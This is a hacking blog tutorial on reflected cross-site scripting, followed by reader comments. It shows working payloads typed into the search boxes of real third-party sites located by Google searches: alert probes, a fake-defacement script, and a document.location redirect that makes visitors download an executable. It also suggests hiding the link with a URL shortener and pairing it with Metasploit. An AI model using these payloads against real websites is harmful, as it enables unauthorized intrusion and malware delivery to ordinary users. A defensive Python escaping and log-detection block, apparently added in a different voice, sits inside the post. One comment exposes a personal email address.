Basic Hacking via Cross Site Scripting (XSS) – The Logic


Basic Hacking via Cross Site Scripting (XSS) – The Logic is our tutorial title for today.

Type : Tutorial

Level : Medium

Target : Cross Site Scripting (XSS) Vulnerable website

According to wikipedia.org, Cross Site Scripting (XSS) is:

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users.

So, put simply, Cross Site Scripting (XSS) is an attack method that lets an attacker inject script into a web page served by a web server so that it runs in the browsers of other users who access that page.

Actually there are two types of Cross Site Scripting (XSS): Non-Persistent and Persistent (you can read more about them on Wikipedia), but in this tutorial we will cover the non-persistent one.

One of my computer security class students asked me three years ago, "What do I get if I successfully find an XSS-vulnerable website?" My simple answer was "it depends": it depends on how the server handles your request and how it takes care of the malicious data you send to it, but even the non-persistent type is enough to spread a malicious file to many internet users.

Let's start the tutorial

Requirements :

1. Find a Cross Site Scripting (XSS) vulnerable website, or

2. Download the simple PHP file I have already created (download link below)

Mediafire.com


Step by Step :

1. You can use the PHP file I have put on mediafire.com to test this in your own lab (use XAMPP), but for this tutorial I will use a real website on the wild internet (do not worry, the logic is the same; once you understand it you will get the point).

2. Use Google to search for a vulnerable website:

[Screenshot: Google search results]

Pencarian is the Indonesian word for search; you can modify the Google search parameters to find much more specific websites, even in your own language.

3. To find a vulnerable website you need trial and error. I tested more than 5 websites to see whether their search feature was vulnerable to XSS or not.

[Screenshot: testing a search box]

The simple method to test is to use an <h1> tag and <script>alert('x');</script>, like the example picture above.

4. If the website is vulnerable, you will see something like this.

[Screenshot: reflected heading and view-source result]

Description :

1. I tested another website and entered the code <h1>TEST</h1> or <script>alert('x');</script> in the search box.

2. The result showed a heading title, but I was not sure, so

3. I checked the selection source to make sure it was not just bold text :-p

4. Oops, my query was processed by the server without any filtering :-)

5. Now that we have a vulnerable website, what next? Did you know that with Cross Site Scripting (XSS) you can also "deface" a website by injecting some code into it? (Not a real deface, just a fake one shown in the victim's browser.)

[Screenshot: fake deface page]


Description :

I put this script in the search box to display the fake deface:

<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>

6. This Cross Site Scripting (XSS) vulnerability can also be used to steal a session cookie; I will write that tutorial later 🙂

7. Now that we can do a fake deface, show a heading tag, and pop an alert with JavaScript, what next?

Let's say I have a fake exe program containing malicious code, hosted on another website, and I want some user to download it. In this tutorial I will use putty.exe as the "malicious" program, which can be downloaded from http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe. BTW, putty is not a malicious program; in this case I only use it for testing purposes to make sure the attack works.

[Screenshot: redirect script in the search box]

Description :

In the search box I put the script:
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>

so the URL looks like this:

http://www.vulnerablewebsite.com/search?keyword=%3Cscript%3Edocument.location=%22http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe%22;%3C/script%3E

8. It is too long 😛, so a URL-shortening service will be useful to make a link like this:

http://goo.gl/T5tPth

9. From steps 7 and 8, can you imagine what happens if the attacker uses a real malicious file to harm the user's computer, or combines it with BackTrack and Metasploit like in my other tutorial (view here)? Only you can answer that 🙂

If the tutorial above is still not clear, you can view the video below:


Countermeasures/Prevention :

1. For developers: always filter user input, and never let special characters reach the page before they have been filtered.

2. For users: if you see something unusual or strange on a website you are visiting, it is better to leave it.
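As an added example (not the author's PHP sample file), the following Python shows the reflection behaviour from steps 3 and 4 beside a hardened version, the "view source" check the author performs, and a log check that spots requests shaped like the URL in step 7. The hostnames, log lines and probe strings are constructed; note that html.escape is correct only for text inside an HTML element body, and other output contexts (attributes, JavaScript) need their own encoding.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# Constructed probe strings: the two test inputs the tutorial types into a search box.
PROBES = ["<h1>TEST</h1>", "<script>alert('x');</script>"]

# Start of a tag that a reflected search term must never reach the page as.
TAG_RE = re.compile(r"<\s*/?\s*(script|h1|img|svg|iframe|style)\b", re.I)


def render_vulnerable(keyword: str) -> str:
    """Reflects the search term into the HTML unchanged: the behaviour the tutorial found."""
    return f"<p>Results for: {keyword}</p>"


def render_hardened(keyword: str) -> str:
    """Entity-encodes the term for an HTML element body, so the browser shows it as text."""
    return f"<p>Results for: {html.escape(keyword, quote=True)}</p>"


def reflects_markup(page: str, keyword: str) -> bool:
    """The tutorial's 'view selection source' check: did the probe survive as a real tag?"""
    return TAG_RE.search(keyword) is not None and keyword in page


def suspicious_requests(log_lines):
    """Returns request paths whose query string, once fully URL-decoded, carries a tag from
    TAG_RE or a document.location / document.cookie reference. Decoding is repeated so a
    double-encoded probe (%253C...) aimed at an app that decodes twice is caught too."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        decoded = urlsplit(m.group(1)).query
        for _ in range(3):
            step = unquote(decoded)
            if step == decoded:
                break
            decoded = step
        if TAG_RE.search(decoded) or re.search(r"document\.(location|cookie)", decoded, re.I):
            hits.append(m.group(1))
    return hits


# Constructed access-log lines in the shape of the step 7 request (host is a placeholder).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2014:10:00:00 +0000] "GET /search?keyword=putty HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2014:10:00:01 +0000] "GET /search?keyword=%3Cscript%3Edocument.location='
    '%22http://files.example/putty.exe%22;%3C/script%3E HTTP/1.1" 200 1024',
    '10.0.0.7 - - [01/Jan/2014:10:00:02 +0000] "GET /search?keyword=%253Ch1%253ETEST%253C/h1%253E HTTP/1.1" 200 700',
]
```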

Hope you found it useful 🙂


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

Visit website: http://www.vishnuvalentino.com

  • Pingback: Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type | Vishnu Valentino Ethical Hacking Tutorial, Security Tips and Trick

  • thank you for teaching hacking via XSS
    very good
    thanks

  • hey!! this really worked for me!!!!

  • Hashcracker001

    The video link is not working.
    Repair it bro!! :D.

    • v4L

      #Hashcracker001

      Fixed! 🙂 thanks for reporting

  • NoArmsNoLegsInTheOcean

    The strings you use are better than most books published on XSS. Are those two your favorite strings to find XSS vulns, or are there more you are not willing to put up here 🙂 ?

    • v4L

      #NoArmsNoLegsInTheOcean
      as long as it works it will be my favourite 🙂

  • imafcknn00b

    Hi,

    I have a question:
    What’s the point of letting people download malicious software through a vulnerable site? Couldn’t you just use the URL shrinker on the original link?

  • hermox

    hehehe 🙂 Thank you 🙂

  • ESETV NOMAS

    Please could you provide another link to download the php code?


  • shahoruq

    @vishnuvalentino:disqus I have subscribed to the mailing list but cannot download the php file from the mediafire.
    please check it or you only send it to me directly on my mail ID- mdshah1994@gmail.com

  • mahdi

    hi
    very good
    thank you
    hope god
